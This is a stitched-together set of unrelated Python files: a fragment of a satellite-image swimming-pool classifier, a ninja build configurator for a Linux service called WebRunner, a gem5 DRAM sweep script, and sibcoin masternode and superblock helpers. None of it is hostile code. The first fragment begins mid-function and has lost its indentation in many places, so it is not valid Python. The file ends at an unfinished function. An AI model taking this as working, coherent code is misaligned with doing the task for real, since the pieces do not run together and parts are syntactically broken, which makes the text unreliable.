x_min, x_max, y_min, y_max = latlong_rectange_to_xyz(lat1, lat2, lon1, lon2, zoom)
n_x = x_max-x_min
n_y = y_max-y_min
n_tiles = n_x*n_y
x_count=0
print 'Downloading X=(%i,%i), Y=(%i,%i)'%(x_min,x_max,y_min,y_max)
print 'n_x: %i'%n_x
print 'n_y: %i'%n_y
print 'That is %i tiles.'%n_tiles
if not(download): return
for x_tmp in range(x_min, x_max):
x_count+=1
print '%i/%i'%(x_count,n_x)
for y_tmp in range(y_min, y_max):
download_one(x_tmp,y_tmp,zoom,prefix=prefix)
def define_chunk(name):
    """Named lat/long regions of interest.

    Returns a dict with 'prefix' plus the rectangle bounds
    lat1/lat2/lon1/lon2 (decimal degrees).
    """
    chunks = {
        'atx': dict(prefix='atx',
                    lat1=hms_to_deg(30, 20, 21.95),
                    lat2=hms_to_deg(30, 12, 32.97),
                    lon1=hms_to_deg(-97, 50, 33.81),
                    lon2=hms_to_deg(-97, 38, 12.31)),
    }
    return chunks[name]
def label_data(prefix, size=100, savename=None):
from glob import glob
from os.path import basename
from PIL import Image
from os.path import isfile
if savename==None: savename=labelpath+'label_'+prefix+'.txt'
# We want to avoid labeling an image twice, so keep track
# of what we've labeled in previous labeling sessions.
if isfile(savename):
fileout = open(savename,'r')
already_seen = [line.split(',')[0] for line in fileout]
fileout.close()
else: already_seen = []
# Now reopen the file for appending.
fileout = open(savename,'a')
pl.ion()
pl.figure(1,figsize=(9,9))
files = glob(imgpath+prefix+'*.png')
for file in np.random.choice(files, size=size, replace=False):
if basename(file) in already_seen: continue
pl.clf()
pl.subplot(1,1,1)
pl.imshow(np.array(Image.open(file)))
pl.title(file)
pl.axis('off')
pl.draw()
label = get_one_char()
if label=='q': break
fileout.write(basename(file)+','+label+'\n')
print file,label
fileout.close()
return
def get_one_char():
    """Read a single keypress from stdin without waiting for Enter.

    Temporarily puts the controlling terminal into raw mode; the previous
    settings are always restored, even if the read raises.
    """
    import sys, tty, termios
    fd = sys.stdin.fileno()
    old_settings = termios.tcgetattr(fd)
    try:
        tty.setraw(sys.stdin.fileno())
        ch = sys.stdin.read(1)
    finally:
        # TCSADRAIN: restore settings after pending output has drained.
        termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
    return ch
def is_number(s):
    """Return True if `s` parses as a float, else False."""
    try:
        float(s)
    except ValueError:
        return False
    return True
def read_label(prefix):
    """Load the label file for `prefix` into a {filename: int label} dict.

    Non-numeric labels (stray keystrokes during labeling) are coerced to 0.
    Fix: local renamed so it no longer shadows the `file` builtin.
    """
    savename = labelpath+'label_'+prefix+'.txt'
    infile = open(savename, 'r')
    labels = {}
    for line in infile:
        tmp = line.split(',')
        if is_number(tmp[1]):
            labels[tmp[0]] = int(tmp[1])
        else:
            labels[tmp[0]] = 0
    infile.close()
    return labels
def load_labeled(prefix='atx', nside=32, quick=False):
    """Load hand-labeled training images as (X, y).

    X: array of nside x nside RGB images; y: 0/1 int labels (any positive
    hand label counts as 1). quick=True reloads the cached pickle instead
    of re-reading the image files.
    """
    import cPickle as pickle
    savename=basepath+'tmp_train_'+prefix+'_%i'%nside+'.pkl'
    if quick:
        X, y = pickle.load(open(savename,'r'))
        return X, y
    from PIL import Image
    tmp=read_label(prefix)
    X=[]; y=[]
    for name,label in tmp.iteritems():
        img_name = imgpath+name
        img = Image.open(img_name)
        # Downsample unless the requested size is already the native 256.
        if nside!=256: img=img.resize((nside,nside),Image.ANTIALIAS)
        img = np.array(img)
        if False:
            # Dead debug branch. NOTE(review): `pdb` is not imported in this
            # file (only ipdb is), so enabling this would raise NameError.
            print img.shape
            pl.imshow(img)
            pdb.set_trace()
        X.append(img)
        y.append(label>0)
    X = np.array(X)
    y = np.array(y).astype(int)
    # Cache the arrays so later calls can use quick=True.
    pickle.dump((X,y), open(savename, 'w'))
    return X,y
def get_colors(name='pool', ncolors=10, quick=True):
    """Return a list of RGB color vectors characteristic of `name`.

    quick=True reloads a previously pickled list; otherwise the hand-picked
    base colors are randomly jittered `ncolors` times (plus one fully random
    decoy per round) and the result is pickled for later quick loads.
    """
    import cPickle as pickle
    savename = basepath + name + '.pkl'
    if quick:
        return pickle.load(open(savename, 'r'))
    if name == 'pool':
        base_colors = [[154, 211, 210],
                       [104, 148, 156],
                       [70, 160, 162],
                       [93, 152, 140],
                       [58, 104, 99]]
    colors = []
    for _ in range(ncolors):
        for base_color in base_colors:
            # Random jitter around each hand-picked pool color.
            colors.append(np.array(base_color) + np.random.randint(-30, high=20, size=3))
        # One fully random decoy color per round.
        colors.append(np.random.randint(0, high=255, size=3))
    pickle.dump(colors, open(savename, 'w'))
    return colors
def get_features(X_img, colors, thresh=30, ds=4):
    """Per-image color-match features.

    For each reference color: mark pixels whose every channel is within
    `thresh` of it, block-average that mask over ds x ds cells, and emit
    the max and the sum of the downsampled mask. Returns an
    (nsamp, 2*len(colors)) feature matrix.

    Fixes: `np.prod` instead of `np.product` (alias removed in NumPy 2),
    and `//` so the reshape stays integral under Python 3 true division.
    """
    nsamp = X_img.shape[0]
    nside = X_img.shape[1]
    cell = nside // ds  # downsampled grid size; assumes ds divides nside
    features = []
    for color in colors:
        target = np.array(color)
        # 1 where all three channels are within thresh of the target color.
        ok_color = np.prod(np.abs(X_img - target) < thresh, axis=-1)
        sm_ok_color = ok_color.reshape(nsamp, cell, ds, cell, ds).mean(4).mean(2)
        features.append(np.max(np.max(sm_ok_color, axis=-1), axis=-1))  # peak match density
        features.append(np.sum(np.sum(sm_ok_color, axis=-1), axis=-1))  # total match area
    return np.vstack(features).T
def train_classifier(prefix='atx', nside=32, ds=4, color_thresh=30, test_size=0.5):
X_img,y=load_labeled(prefix=prefix,nside=nside,quick=False)
if prefix=='atx': color_name='pool'
colors = get_colors(name=color_name, quick=True)
print '...getting features...'
X = get_features(X_img, colors, ds=ds, thresh=color_thresh)
print '...done getting features...'
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier
from sklearn.cross_validation import train_test_split
from sklearn import metrics
rf = ExtraTreesClassifier(n_estimators=200, n_jobs=6, max_features=0.02)
X_train, X_test, y_train, y_test, img_train, img_test = train_test_split(X,y,X_img,test_size=0.5)
print '...fitting...'
rf.fit(X_train, y_train)
y_proba = rf.predict_proba(X_test)[:,1]
fpr, tpr, thresholds = metrics.roc_curve(y_test, y_proba)
auc = metrics.auc(fpr, tpr)
pl.clf(); pl.plot(fpr, tpr, 'b-o')
pl.plot(fpr, fpr/np.mean(y), 'r--'); pl.ylim(0,1); pl.xlim(0,1)
pl.title('AUC: %0.3f'%auc)
for i,th in enumerate(thresholds): print th,tpr[i],tpr[i]/fpr[i]
prob_thresh=0.6
wh_missed=np.where((y_proba<prob_thresh)&(y_test==1))[0]
wh_ok=np.where((y_proba>prob_thresh)&(y_test==1))[0]
def iimshow(img):
    """Clear the current figure and display `img` as uint8."""
    pl.clf()
    pl.imshow(np.array(img, dtype=np.uint8))
def predict_proba_all(classifier, colors, prefix='atx', batchsize=1000, nside=32):
    """Score every downloaded tile for `prefix` with `classifier`.

    Files are processed in batches of `batchsize` to bound memory use.
    Returns (x, y, proba): tile coordinate arrays and the per-tile pool
    probability (positive-class column of predict_proba).
    """
    from glob import glob
    from PIL import Image
    files = glob(imgpath+prefix+'*.png')
    np.random.shuffle(files)
    nfiles = len(files)
    #nbatches=2 #tmpp
    nbatches = np.ceil(1.*nfiles/batchsize).astype(int)
    x=[]; y=[]; proba=[]
    for ibatch in range(nbatches):
        print ibatch,nbatches
        imgs = []
        imin=ibatch*batchsize
        # Last batch may be short of batchsize.
        imax=np.min([(ibatch+1)*batchsize, nfiles])
        # load and resize these images
        for file in files[imin:imax]:
            img = Image.open(file)
            if nside!=256: img=img.resize((nside,nside),Image.ANTIALIAS)
            img = np.array(img)
            imgs.append(img)
            # Tile coordinates are recovered from the filename itself.
            xtmp, ytmp, ztmp = xyz_from_filename(file)
            x.append(xtmp)
            y.append(ytmp)
        this_X = get_features(np.array(imgs), colors)
        this_proba = classifier.predict_proba(this_X)[:,1]
        proba.append(this_proba)
    proba=np.hstack(proba)
    x=np.array(x)
    y=np.array(y)
    return x,y,proba
def write_to_csv(xtile,ytile,proba, proba_cut=0.4):
wh=np.where(proba>proba_cut)[0]
print len(wh)
lat, lon = xyz_to_latlong(xtile[wh], ytile[wh], 19)
medx=int(np.median(xtile))
medy=int(np.median(ytile))
dlat, dlon = xyz_to_latlong(np.array([medx,medx+1]), np.array([medy,medy+1]), 19)
lat -= (0.5*(max(dlat)-min(dlat)))
lon += (0.5*(max(dlon)-min(dlon)))
file=open(prefix+'.csv','w')
file.write('lat,lon\n')
for this_lat, this_lon in zip(lat,lon):
file.write('%0.7f,%0.7f'%(this_lat, this_lon)+'\n')
file.close()
| |
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import glob
import argparse
import ninja_syntax
class Configuration:
    """Emits build.ninja for WebRunner: C compile/link rules, spec
    code-generation rules, and systemd install/enable/start/stop rules."""

    def __init__(self, options):
        self.root_dir = os.path.dirname(os.path.abspath(__file__))
        self.source_dir = os.path.join(self.root_dir, "src")
        self.build_dir = os.path.join(self.root_dir, "build")
        self.artifact_dir = self.root_dir
        self.writer = ninja_syntax.Writer(open(os.path.join(self.root_dir, "build.ninja"), "w"))
        self.object_ext = ".o"

        # Variables
        cflags = ["-std=gnu11", "-g", "-Wall", "-Werror", "-Wno-error=unused-variable", "-fcolor-diagnostics"]
        ldflags = ["-g", "-Wl,-fuse-ld=gold"]
        self.writer.variable("cc", "clang")
        self.writer.variable("cflags", " ".join(cflags))
        self.writer.variable("ldflags", " ".join(ldflags))
        self.writer.variable("optflags", "-O2")
        self.writer.variable("includes", "-I" + self.source_dir)
        self.writer.variable("python", "python")
        self.writer.variable("spec_compiler", "$python " + os.path.join(self.root_dir, "tools", "spec-compiler.py"))
        self.writer.variable("spec_collector", "$python " + os.path.join(self.root_dir, "tools", "spec-collector.py"))
        if not sys.platform.startswith("linux"):
            # Bug fix: diagnostics belong on stderr (original wrote to stdout).
            print("Unsupported platform: %s" % sys.platform, file=sys.stderr)
            sys.exit(1)

        # Rules
        self.writer.rule("cc", "$cc -o $out -c $in -MMD -MF $out.d $optflags $cflags $includes",
                         deps="gcc", depfile="$out.d",
                         description="CC $descpath")
        self.writer.rule("ccld", "$cc $ldflags $libdirs -o $out $in $libs",
                         description="CCLD $descpath")
        self.writer.rule("spec-compile", "$spec_compiler $in --code $code --header $header",
                         description="COMPILE $descpath")
        self.writer.rule("spec-collect", "$spec_collector $in --code $code --header $header",
                         description="COLLECT $descpath")
        self.writer.rule("install", "install -m $mode $in $out",
                         description="INSTALL $descpath")
        self.writer.rule("enable", "systemctl enable $service",
                         description="ENABLE $service")
        self.writer.rule("start", "systemctl start $service",
                         description="START $service")
        self.writer.rule("stop", "systemctl stop $service",
                         description="STOP $service")

    def check(self):
        """Checks system requirements for WebRunner (Linux 3.17+ only)."""
        import sys
        if not sys.platform.startswith("linux"):
            # Bug fix: diagnostics belong on stderr (original wrote to stdout).
            print("Unsupported platform %s: WebRunner is a Linux-only software" % sys.platform, file=sys.stderr)
            sys.exit(1)
        import platform
        import re
        kernel_version_match = re.match(r"\d+\.\d+\.\d+", platform.release())
        if kernel_version_match:
            kernel_release = tuple(map(int, kernel_version_match.group(0).split(".")))
            if kernel_release < (3, 17,):
                print("Unsupported Linux kernel %s: WebRunner requires Linux 3.17+" % kernel_version_match.group(0), file=sys.stderr)
                sys.exit(1)

    def cc(self, source_file, object_file=None):
        """Emit a compile edge for source_file; returns the object path."""
        if not os.path.isabs(source_file):
            source_file = os.path.join(self.source_dir, source_file)
        if object_file is None:
            # Mirror the source tree inside build_dir by default.
            object_file = os.path.join(self.build_dir, os.path.relpath(source_file, self.source_dir)) + self.object_ext
        elif not os.path.isabs(object_file):
            object_file = os.path.join(self.build_dir, object_file)
        variables = {
            "descpath": os.path.relpath(source_file, self.source_dir)
        }
        self.writer.build(object_file, "cc", source_file, variables=variables)
        return object_file

    def ccld(self, object_files, executable_file):
        """Emit a link edge producing executable_file from object_files."""
        if not os.path.isabs(executable_file):
            executable_file = os.path.join(self.artifact_dir, executable_file)
        variables = {
            "descpath": os.path.relpath(executable_file, self.artifact_dir)
        }
        self.writer.build(executable_file, "ccld", object_files, variables=variables)
        return executable_file

    def spec_compile(self, spec_file, code_file=None, header_file=None):
        """Emit a codegen edge turning one XML spec into a C file + header.

        Defaults: '<spec>-gen.c' next to the spec, with a matching '.h'.
        Returns (code_file, header_file).
        """
        if not os.path.isabs(spec_file):
            spec_file = os.path.join(self.source_dir, spec_file)
        if code_file is None:
            code_file = os.path.splitext(spec_file)[0] + "-gen.c"
        elif not os.path.isabs(code_file):
            code_file = os.path.join(self.source_dir, code_file)
        if header_file is None:
            header_file = os.path.splitext(code_file)[0] + ".h"
        elif not os.path.isabs(header_file):
            header_file = os.path.join(self.source_dir, header_file)
        variables = {
            "descpath": os.path.relpath(spec_file, self.source_dir),
            "code": code_file,
            "header": header_file
        }
        self.writer.build([code_file, header_file], "spec-compile", spec_file, variables=variables)
        return code_file, header_file

    def spec_collect(self, spec_files, code_file, header_file):
        """Emit an edge collecting all specs into one registry C file + header."""
        spec_files = [f if os.path.isabs(f) else os.path.join(self.source_dir, f) for f in spec_files]
        if not os.path.isabs(code_file):
            code_file = os.path.join(self.source_dir, code_file)
        if not os.path.isabs(header_file):
            header_file = os.path.join(self.source_dir, header_file)
        variables = {
            "descpath": os.path.relpath(code_file, self.source_dir),
            "code": code_file,
            "header": header_file
        }
        self.writer.build([code_file, header_file], "spec-collect", spec_files, variables=variables)
        return code_file, header_file

    def install(self, local_path, system_path, mode="644"):
        """Emit an install(1) edge copying local_path to system_path."""
        if not os.path.isabs(local_path):
            local_path = os.path.join(self.root_dir, local_path)
        variables = {
            "mode": mode,
            "descpath": os.path.relpath(local_path, self.root_dir)
        }
        self.writer.build(system_path, "install", local_path, variables=variables)
        return system_path

    def enable(self, deps, service, target_name="enable"):
        """Emit a 'systemctl enable' target for `service`."""
        self.writer.build(target_name, "enable", deps, variables=dict(service=service))

    def start(self, deps, service, target_name="start"):
        """Emit a 'systemctl start' target for `service`."""
        self.writer.build(target_name, "start", deps, variables=dict(service=service))

    def stop(self, deps, service, target_name="stop"):
        """Emit a 'systemctl stop' target for `service`."""
        self.writer.build(target_name, "stop", deps, variables=dict(service=service))

    def phony(self, name, targets):
        """Declare a phony target depending on `targets`.

        Bug fix: the original joined the names into one string with " & ",
        making the phony target depend on a single bogus path like
        "a & b"; ninja expects the dependency list itself.
        """
        if isinstance(targets, str):
            targets = [targets]
        self.writer.build(name, "phony", targets)

    def default(self, target):
        """Mark `target` as the default build target."""
        self.writer.default(target)
parser = argparse.ArgumentParser(description="WebRunner configuration script")
def main():
    """Generate build.ninja: compile kernel specs (XML) and C sources,
    build the webserver and runner objects, link the webrunner binary,
    and emit install/enable/start/stop convenience targets."""
    options = parser.parse_args()
    config = Configuration(options)
    kernel_specifications = []
    kernel_objects = []
    for source_dir, _, filenames in os.walk(os.path.join(config.source_dir, "kernels")):
        for filename in filenames:
            # Skip hidden files (editor swap files, .DS_Store, etc.).
            if os.path.basename(filename).startswith("."):
                continue
            fileext = os.path.splitext(filename)[1]
            if fileext == ".xml":
                # Each XML spec generates a C file + header, then an object.
                specification_file = os.path.join(source_dir, filename)
                gen_c_file, gen_h_file = config.spec_compile(specification_file)
                gen_object = config.cc(gen_c_file)
                kernel_specifications.append(specification_file)
                kernel_objects.append(gen_object)
            elif fileext == ".c" and not filename.endswith("-gen.c"):
                # Hand-written kernel sources; "-gen.c" files are build outputs.
                kernel_objects.append(config.cc(os.path.join(source_dir, filename)))
    config.spec_collect(kernel_specifications, "runner/spec.c", "runner/spec.h")
    webserver_objects = [
        config.cc("webserver/server.c"),
        config.cc("webserver/request.c"),
        config.cc("webserver/options.c"),
        config.cc("webserver/logs.c"),
        config.cc("webserver/http.c"),
        config.cc("webserver/parse.c"),
    ]
    runner_objects = [
        config.cc("runner/perfctr.c"),
        config.cc("runner/median.c"),
        config.cc("runner/sandbox.c"),
        config.cc("runner/loader.c"),
        config.cc("runner/spec.c"),
    ]
    webrunner = config.ccld(webserver_objects + runner_objects + kernel_objects, "webrunner")
    config.default(webrunner)
    # System installation targets (not built by default; need root).
    webrunner_program = config.install(webrunner, "/usr/sbin/webrunner", mode="755")
    webrunner_service = config.install("webrunner.service", "/etc/systemd/system/webrunner.service")
    config.enable([webrunner_program, webrunner_service], "webrunner.service")
    config.start([], "webrunner.service")
    config.stop([], "webrunner.service")
    config.phony("install", ["enable"])

if __name__ == "__main__":
    # main() returns None, so this exits with status 0 on success.
    sys.exit(main())
| |
# Copyright (c) 2014-2015 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
import optparse
import m5
from m5.objects import *
from m5.util import addToPath
from m5.internal.stats import periodicStatDump
addToPath('../common')
import MemConfig
# this script is helpful to sweep the efficiency of a specific memory
# controller configuration, by varying the number of banks accessed,
# and the sequential stride size (how many bytes per activate), and
# observe what bus utilisation (bandwidth) is achieved
parser = optparse.OptionParser()
# Use a single-channel DDR3-1600 x64 by default
parser.add_option("--mem-type", type="choice", default="DDR3_1600_x64",
choices=MemConfig.mem_names(),
help = "type of memory to use")
parser.add_option("--mem-ranks", "-r", type="int", default=1,
help = "Number of ranks to iterate across")
parser.add_option("--rd_perc", type="int", default=100,
help = "Percentage of read commands")
parser.add_option("--mode", type="choice", default="DRAM",
choices=["DRAM", "DRAM_ROTATE"],
help = "DRAM: Random traffic; \
DRAM_ROTATE: Traffic rotating across banks and ranks")
parser.add_option("--addr_map", type="int", default=1,
help = "0: RoCoRaBaCh; 1: RoRaBaCoCh/RoRaBaChCo")
(options, args) = parser.parse_args()
if args:
print "Error: script doesn't take any positional arguments"
sys.exit(1)
# at the moment we stay with the default open-adaptive page policy,
# and address mapping

# start with the system itself, using a multi-layer 2.0 GHz
# crossbar, delivering 64 bytes / 3 cycles (one header cycle)
# which amounts to 42.7 GByte/s per layer and thus per port
system = System(membus = IOXBar(width = 32))
system.clk_domain = SrcClockDomain(clock = '2.0GHz',
                                   voltage_domain =
                                   VoltageDomain(voltage = '1V'))

# we are fine with 256 MB memory for now
mem_range = AddrRange('256MB')
system.mem_ranges = [mem_range]

# do not worry about reserving space for the backing store
system.mmap_using_noreserve = True

# force a single channel to match the assumptions in the DRAM traffic
# generator
options.mem_channels = 1
options.external_memory_system = 0
options.tlm_memory = 0
options.elastic_trace_en = 0
MemConfig.config_mem(options, system)

# the following assumes that we are using the native DRAM
# controller, check to be sure
if not isinstance(system.mem_ctrls[0], m5.objects.DRAMCtrl):
    fatal("This script assumes the memory is a DRAMCtrl subclass")

# there is no point slowing things down by saving any data
system.mem_ctrls[0].null = True

# Set the address mapping based on input argument
# Default to RoRaBaCoCh
if options.addr_map == 0:
    system.mem_ctrls[0].addr_mapping = "RoCoRaBaCh"
elif options.addr_map == 1:
    system.mem_ctrls[0].addr_mapping = "RoRaBaCoCh"
else:
    fatal("Did not specify a valid address map argument")

# stay in each state for 0.25 ms, long enough to warm things up, and
# short enough to avoid hitting a refresh
period = 250000000

# this is where we go off piste, and print the traffic generator
# configuration that we will later use, crazy but it works
cfg_file_name = "configs/dram/sweep.cfg"
cfg_file = open(cfg_file_name, 'w')

# stay in each state as long as the dump/reset period, use the entire
# range, issue transactions of the right DRAM burst size, and match
# the DRAM maximum bandwidth to ensure that it is saturated

# get the number of banks
nbr_banks = system.mem_ctrls[0].banks_per_rank.value

# determine the burst length in bytes
burst_size = int((system.mem_ctrls[0].devices_per_rank.value *
                  system.mem_ctrls[0].device_bus_width.value *
                  system.mem_ctrls[0].burst_length.value) / 8)

# next, get the page size in bytes
page_size = system.mem_ctrls[0].devices_per_rank.value * \
    system.mem_ctrls[0].device_rowbuffer_size.value

# match the maximum bandwidth of the memory, the parameter is in seconds
# and we need it in ticks (ps)
itt = system.mem_ctrls[0].tBURST.value * 1000000000000

# assume we start at 0
max_addr = mem_range.end

# use min of the page size and 512 bytes as that should be more than
# enough
max_stride = min(512, page_size)

# now we create the state by iterating over the stride size from burst
# size to the max stride, and from using only a single bank up to the
# number of banks available
nxt_state = 0
for bank in range(1, nbr_banks + 1):
    for stride_size in range(burst_size, max_stride + 1, burst_size):
        # One generator STATE per (bank count, stride) combination.
        cfg_file.write("STATE %d %d %s %d 0 %d %d "
                       "%d %d %d %d %d %d %d %d %d\n" %
                       (nxt_state, period, options.mode, options.rd_perc,
                        max_addr, burst_size, itt, itt, 0, stride_size,
                        page_size, nbr_banks, bank, options.addr_map,
                        options.mem_ranks))
        nxt_state = nxt_state + 1

cfg_file.write("INIT 0\n")

# go through the states one by one
for state in range(1, nxt_state):
    cfg_file.write("TRANSITION %d %d 1\n" % (state - 1, state))

# Self-loop on the final state so the generator stays there.
cfg_file.write("TRANSITION %d %d 1\n" % (nxt_state - 1, nxt_state - 1))

cfg_file.close()

# create a traffic generator, and point it to the file we just created
system.tgen = TrafficGen(config_file = cfg_file_name)

# add a communication monitor
system.monitor = CommMonitor()

# connect the traffic generator to the bus via a communication monitor
system.tgen.port = system.monitor.slave
system.monitor.master = system.membus.slave

# connect the system port even if it is not used in this example
system.system_port = system.membus.slave

# every period, dump and reset all stats
periodicStatDump(period)

# run Forrest, run!
root = Root(full_system = False, system = system)
root.system.mem_mode = 'timing'

m5.instantiate()
m5.simulate(nxt_state * period)

print "DRAM sweep with burst: %d, banks: %d, max stride: %d" % \
    (burst_size, nbr_banks, max_stride)
| |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'lib'))
import base58
import hashlib
import re
from decimal import Decimal
import simplejson
import binascii
from misc import printdbg, epoch2str
import time
def is_valid_dash_address(address, network='mainnet'):
    """Disabled for sibcoin: always raises RuntimeWarning.

    The original kept a complete Dash address-validation body after the
    raise; all of it was unreachable dead code and has been removed. Use
    is_valid_sibcoin_address / is_valid_address instead.

    :raises RuntimeWarning: always.
    """
    raise RuntimeWarning('This method should not be used with sibcoin')
def is_valid_sibcoin_address(address, network='mainnet'):
    """Validate a base58check sibcoin public-key address.

    A valid address is the base58check encoding of 1 version byte +
    a 20-byte RIPEMD-160 hash + 4 checksum bytes (25 bytes total, which
    is about 34 characters: 25 * log2(256) / log2(58)).

    :param address: candidate address string.
    :param network: 'mainnet' (version 63) or 'testnet' (version 125).
    :return: True only for a well-formed address with the right version.
    """
    sibcoin_version = 125 if network == 'testnet' else 63

    # Check length first: the base58 library has problems with long
    # addresses (which are invalid anyway).
    if len(address) < 26 or len(address) > 35:
        return False

    try:
        decoded = base58.b58decode_chk(address)
        address_version = ord(decoded[0:1])
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # propagate; any decode/checksum failure means "not an address".
        return False

    return address_version == sibcoin_version
def is_valid_address(address, network='mainnet'):
    """Coin-agnostic entry point; delegates to the sibcoin validator."""
    return is_valid_sibcoin_address(address, network)
def hashit(data):
    """SHA-256 of the UTF-8 encoding of `data`, returned as a big integer."""
    digest = hashlib.sha256(data.encode('utf-8')).hexdigest()
    return int(digest, 16)
# returns the masternode VIN of the elected winner
def elect_mn(**kwargs):
    """Deterministically elect one masternode for a block.

    The winner is the ENABLED masternode whose hashed VIN is numerically
    closest to the hashed block hash, so every node computes the same
    winner without communication.

    Keyword args: block_hash (hex string), mnlist (iterable of objects
    with .status and .vin attributes).
    :return: the winning VIN string, or None if no masternode is enabled.
    """
    current_block_hash = kwargs['block_hash']
    mn_list = kwargs['mnlist']

    block_hash_hash = hashit(current_block_hash)

    # Only ENABLED masternodes are eligible.
    candidates = [
        {'vin': mn.vin, 'diff': abs(hashit(mn.vin) - block_hash_hash)}
        for mn in mn_list if mn.status == 'ENABLED'
    ]
    candidates.sort(key=lambda k: k['diff'])

    try:
        return candidates[0]['vin']
    except IndexError:
        # Narrowed from a bare `except:`; only "no candidates" is expected.
        return None
def parse_masternode_status_vin(status_vin_string):
    """Extract a 'txid-index' collateral outpoint from a masternode
    status VIN string.

    Accepts both the 'CTxIn(COutPoint(txid, n), ...' form and the plain
    'txid-n' form returned by newer RPC versions. Returns None for the
    all-zero (unspendable) txid.
    """
    m = re.match(r'CTxIn\(COutPoint\(([0-9a-zA-Z]+),\s*(\d+)\),', status_vin_string)
    if m is None:
        # To Support additional format of string return from masternode status rpc.
        m = re.match(r'([0-9a-zA-Z]+)-(\d+)', status_vin_string)

    txid = m.group(1)
    index = m.group(2)
    if txid == '0000000000000000000000000000000000000000000000000000000000000000':
        return None
    return txid + '-' + index
def create_superblock(proposals, event_block_height, budget_max, sb_epoch_time):
    """Assemble a Superblock from ranked proposals.

    Walks `proposals` in the given (rank) order, skipping any that would
    push the total over `budget_max` or whose fudged
    [start_epoch, end_epoch] window does not contain `sb_epoch_time`.
    Returns a Superblock with payments sorted by proposal hash
    descending, or None if nothing qualifies.
    """
    from models import Superblock, GovernanceObject, Proposal
    from constants import SUPERBLOCK_FUDGE_WINDOW
    import copy
    # don't create an empty superblock
    if (len(proposals) == 0):
        printdbg("No proposals, cannot create an empty superblock.")
        return None
    budget_allocated = Decimal(0)
    fudge = SUPERBLOCK_FUDGE_WINDOW  # fudge-factor to allow for slightly incorrect estimates
    payments_list = []
    for proposal in proposals:
        fmt_string = "name: %s, rank: %4d, hash: %s, amount: %s <= %s"
        # skip proposals that are too expensive...
        if (budget_allocated + proposal.payment_amount) > budget_max:
            printdbg(
                fmt_string % (
                    proposal.name,
                    proposal.rank,
                    proposal.object_hash,
                    proposal.payment_amount,
                    "skipped (blows the budget)",
                )
            )
            continue
        # skip proposals if the SB isn't within the Proposal time window...
        window_start = proposal.start_epoch - fudge
        window_end = proposal.end_epoch + fudge
        printdbg("\twindow_start: %s" % epoch2str(window_start))
        printdbg("\twindow_end: %s" % epoch2str(window_end))
        printdbg("\tsb_epoch_time: %s" % epoch2str(sb_epoch_time))
        if (sb_epoch_time < window_start or sb_epoch_time > window_end):
            printdbg(
                fmt_string % (
                    proposal.name,
                    proposal.rank,
                    proposal.object_hash,
                    proposal.payment_amount,
                    "skipped (SB time is outside of Proposal window)",
                )
            )
            continue
        printdbg(
            fmt_string % (
                proposal.name,
                proposal.rank,
                proposal.object_hash,
                proposal.payment_amount,
                "adding",
            )
        )
        payment = {
            'address': proposal.payment_address,
            'amount': "{0:.8f}".format(proposal.payment_amount),
            'proposal': "{}".format(proposal.object_hash)
        }
        temp_payments_list = copy.deepcopy(payments_list)
        temp_payments_list.append(payment)
        # calculate size of proposed Superblock
        sb_temp = Superblock(
            event_block_height=event_block_height,
            payment_addresses='|'.join([pd['address'] for pd in temp_payments_list]),
            payment_amounts='|'.join([pd['amount'] for pd in temp_payments_list]),
            proposal_hashes='|'.join([pd['proposal'] for pd in temp_payments_list])
        )
        # NOTE(review): proposed_sb_size is computed but never compared
        # against any limit -- a serialized-size cap was probably intended
        # here. Confirm before removing.
        proposed_sb_size = len(sb_temp.serialise())
        # add proposal and keep track of total budget allocation
        budget_allocated += proposal.payment_amount
        payments_list.append(payment)
    # don't create an empty superblock
    if not payments_list:
        printdbg("No proposals made the cut!")
        return None
    # 'payments' now contains all the proposals for inclusion in the
    # Superblock, but needs to be sorted by proposal hash descending
    payments_list.sort(key=lambda k: k['proposal'], reverse=True)
    sb = Superblock(
        event_block_height=event_block_height,
        payment_addresses='|'.join([pd['address'] for pd in payments_list]),
        payment_amounts='|'.join([pd['amount'] for pd in payments_list]),
        proposal_hashes='|'.join([pd['proposal'] for pd in payments_list]),
    )
    printdbg("generated superblock: %s" % sb.__dict__)
    return sb
# convenience
def deserialise(hexdata):
    """Hex string -> Python object (hex -> JSON bytes -> object,
    with Decimals preserved)."""
    raw_json = binascii.unhexlify(hexdata)
    return simplejson.loads(raw_json, use_decimal=True)
def serialise(dikt):
    """Python object -> hex string (sorted-key JSON with Decimals -> hex)."""
